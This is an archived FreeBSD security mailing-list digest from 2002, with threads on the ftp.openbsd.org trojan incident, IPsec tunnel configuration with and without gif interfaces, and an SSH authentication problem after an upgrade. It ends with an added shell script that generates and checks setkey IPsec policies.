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 ------=_NextPart_000_0001_01C23A2E.0244DFD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 12:52:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C80E37B400 for ; Fri, 2 Aug 2002 12:52:53 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id A7A1343E6A for ; Fri, 2 Aug 2002 12:52:41 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) 
From: "Duncan Patton a Campbell is Dhu"
To: "Duncan Patton a Campbell is Dhu", Holt Grendal, security@FreeBSD.ORG
Subject: Re: How was ftp.openbsd.org compromised?
Date: Fri, 2 Aug 2002 13:53:10 -0600
Message-Id: <20020802195310.M1510@babayaga.neotext.ca>
In-Reply-To: <20020801180025.M96766@babayaga.neotext.ca>

I should think before letting paranoia set in. There's an AI Hacker's convention on in Edmonton...

Only those who compulsively upgrade their security and don't check the checksums could get this.

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: "Duncan Patton a Campbell is Dhu"
To: Holt Grendal, security@FreeBSD.ORG
Sent: Thu, 1 Aug 2002 12:00:25 -0600
Subject: Re: How was ftp.openbsd.org compromised?

> Ah yes, the Politics of Security rears its head.
>
> From the looks of it, this "trojan" was meant to be found: far too clumsy and obvious to be otherwise.
>
> Why? One can only speculate, but I'd hazard a guess that someone with access to the U of A's sunsite has a vested interest in defaming Open Source systems and software.
>
> So, who has lately claimed that Open Source is Evil and Anti-Capitalist?
>
> Nahh, couldn't be. That would mean bribes and blackmail.
>
> Mebbe the problem is that info really isn't Capital at all, and the bluff might be called.
>
> Duncan Patton a Campbell is Duibh ;-)
>
> ---------- Original Message -----------
> From: Holt Grendal
> To: security@FreeBSD.ORG
> Sent: Thu, 1 Aug 2002 08:46:03 -0700 (PDT)
> Subject: How was ftp.openbsd.org compromised?
>
> > How was ftp.openbsd.org compromised?
> >
> > Anything we need to worry about?
> ------- End of Original Message -------
------- End of Original Message -------

From owner-freebsd-security Fri Aug 2 14:04:20 2002
From: "Peter C. Lai"
To: Duncan Patton a Campbell is Dhu
Cc: Holt Grendal, security@FreeBSD.ORG
Subject: Re: How was ftp.openbsd.org compromised?
Date: Fri, 2 Aug 2002 17:04:15 -0400
Message-ID: <20020802170415.D19655@cowbert.2y.net>
Reply-To: peter.lai@uconn.edu
In-Reply-To: <20020802195310.M1510@babayaga.neotext.ca>

On Fri, Aug 02, 2002 at 01:53:10PM -0600, Duncan Patton a Campbell is Dhu wrote:
> I should think before letting paranoia set in. There's an AI
> Hacker's

Why are you calling Bioinformaticians "AI hackers"? And please don't group reply since we are so hopelessly off topic here.

> convention on in Edmonton...
>
> Only those who compulsively upgrade their security and don't
> check the checksums could get this.
>
> Duncan Patton a Campbell is Duibh ;-)

--
Peter C. Lai
University of Connecticut Dept. of Molecular and Cell Biology
Yale University School of Medicine Center for Medical Informatics | SenseLab | Human Brain Project
http://cowbert.2y.net/

From owner-freebsd-security Fri Aug 2 14:48:10 2002
From: "Matthew Grooms"
Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...]
Date: Fri, 02 Aug 2002 16:47:57 -0500

Hey there,

>But why? Is there something this configuration buys you that you don't
>get when all are "vanilla" ESP tunnels?

I understand this is not necessary. The first time I set up ipsec on freebsd I thought it was mandatory out of ignorance. After all there are quite a few how-to's that reflect this sort of configuration ...
http://www.x-itec.de/projects/tuts/ipsec-howto.txt
http://www.daemonnews.org/200101/ipsec-howto.html

This one makes an attempt at explaining why it is beneficial. I'm not too sure if it is an entirely compelling argument.

http://asherah.dyndns.org/~josh/ipsec-howto.txt

In any case, I was attempting to help out by answering a peer's question to the best of my ability. I was not endorsing one method or another. Note that both were illustrated in the example I posted.

>> spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec
>> esp/tunnel/10.22.200.1-10.1.2.1/require;
>> spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec
>> esp/tunnel/10.1.2.1-10.22.200.1/require;

>You seem to be doing this backwards from the usual way (or what I
>think of as the usual way)... and I really do not understand why. You
>are taking traffic from,
>...

It's only backwards if you are used to implementing IPSEC communications in a non-gif'd configuration. As mentioned before, this is endorsed by many how-to's available. If you don't like this method, don't use it. I for one prefer the gif'd alternative but will be more than happy to admit that the benefits appear to be mostly cosmetic.

-Matthew

From owner-freebsd-security Fri Aug 2 15:59:08 2002
From: "Duncan Patton a Campbell is Dhu"
To: "Matthew Grooms"
Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...]
Date: Fri, 2 Aug 2002 16:59:34 -0600
Message-Id: <20020802225934.M20274@babayaga.neotext.ca>

I made the same mistake. Well, hard to call it a mistake, since it worked, but it did make things more complicated.

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: "Matthew Grooms"
Sent: Fri, 02 Aug 2002 16:47:57 -0500
Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG toipsec/racoontroubles, help please ...]

> Hey there,
>
> >But why? Is there something this configuration buys you that you don't
> >get when all are "vanilla" ESP tunnels?
>
> I understand this is not necessary.
> The first time I set up ipsec on freebsd I thought it was
> mandatory out of ignorance. After all there are quite
> a few how-to's that reflect this sort of configuration ...
>
> http://www.x-itec.de/projects/tuts/ipsec-howto.txt
> http://www.daemonnews.org/200101/ipsec-howto.html
>
> This one makes an attempt at explaining why it is
> beneficial. I'm not too sure if it is an entirely
> compelling argument.
>
> http://asherah.dyndns.org/~josh/ipsec-howto.txt
>
> In any case, I was attempting to help out by answering
> a peer's question to the best of my ability. I was not
> endorsing one method or another. Note that both were
> illustrated in the example I posted.
>
> >> spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec
> >> esp/tunnel/10.22.200.1-10.1.2.1/require;
> >> spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec
> >> esp/tunnel/10.1.2.1-10.22.200.1/require;
>
> >You seem to be doing this backwards from the usual way (or what I
> >think of as the usual way)... and I really do not understand why. You
> >are taking traffic from,
> >...
>
> It's only backwards if you are used to implementing
> IPSEC communications in a non-gif'd configuration. As
> mentioned before, this is endorsed by many how-to's
> available. If you don't like this method, don't use
> it. I for one prefer the gif'd alternative but will
> be more than happy to admit that the benefits appear
> to be mostly cosmetic.
>
> -Matthew
------- End of Original Message -------

From owner-freebsd-security Fri Aug 2 17:20:41 2002
From: "Brad Davis"
To: freebsd-security@freebsd.org
Subject: SSH upgrade?
Date: Fri, 02 Aug 2002 18:20:36 -0600

Hello,

I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from this box out to the world. I get an error that Host authentication failed. It does work from the root account but not from my user account so I deleted ~/.ssh and that hasn't helped either. Any ideas?
Thanks,
Brad

From owner-freebsd-security Fri Aug 2 21:10:30 2002
From: "Ciro Maeitta"
To: "Brad Davis"
Subject: Re: SSH upgrade?
Date: Sat, 3 Aug 2002 00:10:27 -0400
Message-ID: <003101c23aa3$b372a330$0100a8c0@asgardnet.org>

I had this same issue on a Linux box with the same version. I don't quite remember, but I think it had something to do with the host keys... you might want to have a look at sshd_config to make sure everything is 5x5 there.

HTH
-C

----- Original Message -----
From: "Brad Davis"
Sent: Friday, August 02, 2002 2020h
Subject: SSH upgrade?

> Hello,
>
> I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the
> upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from
> this box out to the world. I get an error that Host authentication failed.
> It does work from the root account but not from my user account so I deleted
> ~/.ssh and that hasn't helped either. Any ideas?
>
> Thanks,
> Brad

From owner-freebsd-security Fri Aug 2 22:22:18 2002
From: Maciej Wiśniewski
To: Trish Lynch
Cc: freebsd-security@FreeBSD.org
Subject: Re: [Q] FreeBSD IPSec Discussion.
Date: Sat, 3 Aug 2002 07:22:12 +0200
Message-ID: <20020803072211.A13088@killer.crypton.pl>
In-Reply-To: <20020802131910.E6519-100000@femme.sapphite.org>

Hello

I have one question: why do you use a gif interface while esp does all the job for you without any additional gif interfaces ???

I have some network of gateways tunneling IP packets via IPSec and it's pretty stable too. And I don't use any gifs or other extra toys: just a clean IPSec configuration.

Maybe it's something about which I should know ?

Regards
Nomad

On Fri, Aug 02, 2002 at 01:21:35PM -0400, Trish Lynch wrote:
>
> Lots of people have requested that I document this info somewhere, and I
> will do so, probably this Sunday, when I have a little free time to
> myself.
>
> I *do* use the gif interface, and I have some pretty stable tunnels,
> again, YMMV.
>
> I've even gotten it to run with interfaces that have packets diverted
> through natd :)
>
> -Trish
>
> On Fri, 2 Aug 2002, Trish Lynch wrote:
>
> > No, it's so complicated that nobody has the answers :)
> >
> > Here or -questions would most likely be the best place. I just recently
> > learned a hell of a lot about KAME/racoon by trial and error over the past
> > couple weeks, including interop issues between other vendor's
> > software/hardware (specifically Ravlins), so if I can help, I'll attempt
> > to.
> >
> > -Trish
> >
> > --
> > Trish Lynch trish@bsdunix.net
> > FreeBSD The Power to Serve
> > Ecartis Core Team trish@listmistress.org
> > http://www.freebsd.org
>
> --
> Trish Lynch trish@bsdunix.net
> FreeBSD The Power to Serve
> Ecartis Core Team trish@listmistress.org
> http://www.freebsd.org

From owner-freebsd-security Sat Aug 3 13:43:37 2002
From: Eric Anderson
To: Brad Davis
Cc: freebsd-security@freebsd.org
Subject: Re: SSH upgrade?
Date: Sat, 03 Aug 2002 15:45:43 -0500
Message-ID: <3D4C40F7.6D87D239@centtech.com>

Try ssh -v, and see exactly what it is complaining about.

Eric

Brad Davis wrote:
> Hello,
>
> I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the
> upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from
> this box out to the world. I get an error that Host authentication failed.
> It does work from the root account but not from my user account so I deleted
> ~/.ssh and that hasn't helped either. Any ideas?
>
> Thanks,
> Brad

From owner-freebsd-security Sat Aug 3 15:58:51 2002
Date: Sat, 3 Aug 2002 18:53:33 -0400
From: Steve Shorter
To: Eric Anderson
Cc: Brad Davis, freebsd-security@freebsd.org
Subject: Re: SSH upgrade?
Message-ID: <20020803185333.A83725@nomad.lets.net>
References: <3D4C40F7.6D87D239@centtech.com>
In-Reply-To: <3D4C40F7.6D87D239@centtech.com>; from anderson@centtech.com on Sat, Aug 03, 2002 at 03:45:43PM -0500

On Sat, Aug 03, 2002 at 03:45:43PM -0500, Eric Anderson wrote:
> Try ssh -v, and see exactly what it is complaining about.
>
> Eric
>
>
> Brad Davis wrote:
> > Hello,
> >
> > I just upgraded a machine from 4.5-RELEASE to 4.6-STABLE and included in the
> > upgrade was to OpenSSH 3.4p1. Since then I have not been able to ssh from
> > this box out to the world. I get an error that Host authentication failed.
> > It does work from the root account but not from my user account so I deleted
> > ~/.ssh and that hasn't helped either. Any ideas?

I believe the default order of authentication techniques has changed. The
man page gives full details. If you want to use the same authentication
then you must explicitly configure it in ssh_config.

-steve
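Nomad's gif-less tunnel-mode setup from the IPsec thread above, as an added example that is not code from the list or from either poster: a small sh script that emits the setkey(8) policy for an ESP tunnel between two gateways, the gif(4)-plus-transport-mode form for contrast (that pairing is an assumption; the thread does not show Trish's policies), and a check that every outbound tunnel policy has its inbound mirror. Function names and all addresses are constructed.

```shell
#!/bin/sh
# Added example (not code from the thread). Generates setkey(8) policy for an
# ESP tunnel-mode VPN between two gateways with no gif(4) interface, the
# gif-less IPsec setup Nomad describes: tunnel-mode SAs carry the inner IP
# packet themselves, so no IP-in-IP interface is needed. Addresses are
# constructed; SA negotiation (racoon) is not covered here.

# gen_tunnel_spd LOCAL_GW REMOTE_GW LOCAL_NET REMOTE_NET [LOCAL_NET REMOTE_NET ...]
# Emits one out/in policy pair per protected subnet pair.
gen_tunnel_spd() {
    lgw=$1; rgw=$2; shift 2
    echo 'spdflush;'
    while [ $# -ge 2 ]; do
        lnet=$1; rnet=$2; shift 2
        # outbound: our subnet to theirs must leave inside an ESP tunnel lgw->rgw
        echo "spdadd $lnet $rnet any -P out ipsec esp/tunnel/$lgw-$rgw/require;"
        # inbound mirror: their subnet to ours must arrive inside rgw->lgw;
        # "require" discards clear-text packets that match the selector
        echo "spdadd $rnet $lnet any -P in ipsec esp/tunnel/$rgw-$lgw/require;"
    done
}

# For contrast, the gif(4) variant: gif does the IP-in-IP encapsulation and
# the policy protects only that encapsulated (ip4) traffic between the two
# gateways in transport mode. gif0 configuration and routes are not shown.
gen_gif_spd() {
    echo 'spdflush;'
    echo "spdadd $1 $2 ip4 -P out ipsec esp/transport//require;"
    echo "spdadd $2 $1 ip4 -P in ipsec esp/transport//require;"
}

# check_spd_symmetry: reads a policy set on stdin and returns 0 only if every
# "out" tunnel policy has its mirrored "in" policy with the endpoints
# reversed. A missing mirror is a classic cause of a one-way tunnel.
check_spd_symmetry() {
    spd=$(cat)
    printf '%s\n' "$spd" | grep '^spdadd .* -P out ipsec esp/tunnel/' |
    while read -r kw src dst up p dir ipsec rest; do
        ep=${rest#esp/tunnel/}; ep=${ep%"/require;"}   # leaves "A-B"
        a=${ep%-*}; b=${ep#*-}
        mirror="spdadd $dst $src $up -P in ipsec esp/tunnel/$b-$a/require;"
        printf '%s\n' "$spd" | grep -qxF -- "$mirror" || exit 1
    done
}

# On the local gateway (swap the arguments on the remote gateway):
#   gen_tunnel_spd 203.0.113.1 198.51.100.1 192.168.1.0/24 192.168.2.0/24 | setkey -c
```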